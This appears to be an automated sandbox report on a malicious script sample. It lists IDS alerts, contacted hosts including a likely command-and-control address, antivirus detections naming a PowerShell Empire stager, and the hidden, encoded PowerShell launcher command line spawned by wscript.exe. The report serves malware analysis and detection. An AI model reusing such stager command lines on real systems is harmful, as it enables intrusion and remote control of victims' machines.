Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 12, 2024, 11:19 a.m. | Aug. 12, 2024, 11:21 a.m. |
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc 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
2628
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 117.18.232.200:443 -> 192.168.56.101:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.101:49169 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49170 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49168 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49171 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.101:49172 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -noP -sta -w 1 -enc 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 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc 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 |
host | 117.18.232.200 |
host | 89.197.154.116 |
parent_process | wscript.exe | martian_process | powershell -noP -sta -w 1 -enc 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 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc 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 |
option | -nop | value | Does not load current user profile |
Cynet | Malicious (score: 99) |
CAT-QuickHeal | Script.Trojan.39876 |
Skyhigh | PS/Dropper.f |
ALYac | GT:VB.ObfDldr.28.29C080A2 |
VIPRE | GT:VB.ObfDldr.28.29C080A2 |
Sangfor | Malware.Generic-VBS.Save.f99adb70 |
Arcabit | GT:VB.ObfDldr.28.29C080A2 |
Symantec | Trojan.Malscript!gen8 |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.ABM |
McAfee | PS/Dropper.f |
Avast | VBS:Downloader-AXD [Trj] |
Kaspersky | HEUR:Trojan.PowerShell.Generic |
BitDefender | GT:VB.ObfDldr.28.29C080A2 |
NANO-Antivirus | Trojan.Script.Downloader.inbiqr |
MicroWorld-eScan | GT:VB.ObfDldr.28.29C080A2 |
Emsisoft | GT:VB.ObfDldr.28.29C080A2 (B) |
F-Secure | Malware.VBS/PSRunner.VPSV |
FireEye | GT:VB.ObfDldr.28.29C080A2 |
Sophos | ATK/Empire-U |
Ikarus | Trojan-Downloader.PowerShell.Agent |
Avira | VBS/PSRunner.VPSV |
MAX | malware (ai score=83) |
Xcitium | TrojWare.Win32.BadShell.XSN@7pmib7 |
Microsoft | VirTool:PowerShell/Empire.gen!A |
ZoneAlarm | HEUR:Trojan.PowerShell.Generic |
GData | GT:VB.ObfDldr.28.29C080A2 |
AhnLab-V3 | Powershell/Downloader.S5 |
Tencent | Heur:Trojan.Powershell.Generic.u |
huorong | TrojanDownloader/PS.MalDownload.g |
Fortinet | PowerShell/Agent.AN!tr |
AVG | VBS:Downloader-AXD [Trj] |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
dead_host | 192.168.56.101:49165 |
dead_host | 192.168.56.101:49164 |
dead_host | 89.197.154.116:7810 |
dead_host | 192.168.56.101:49163 |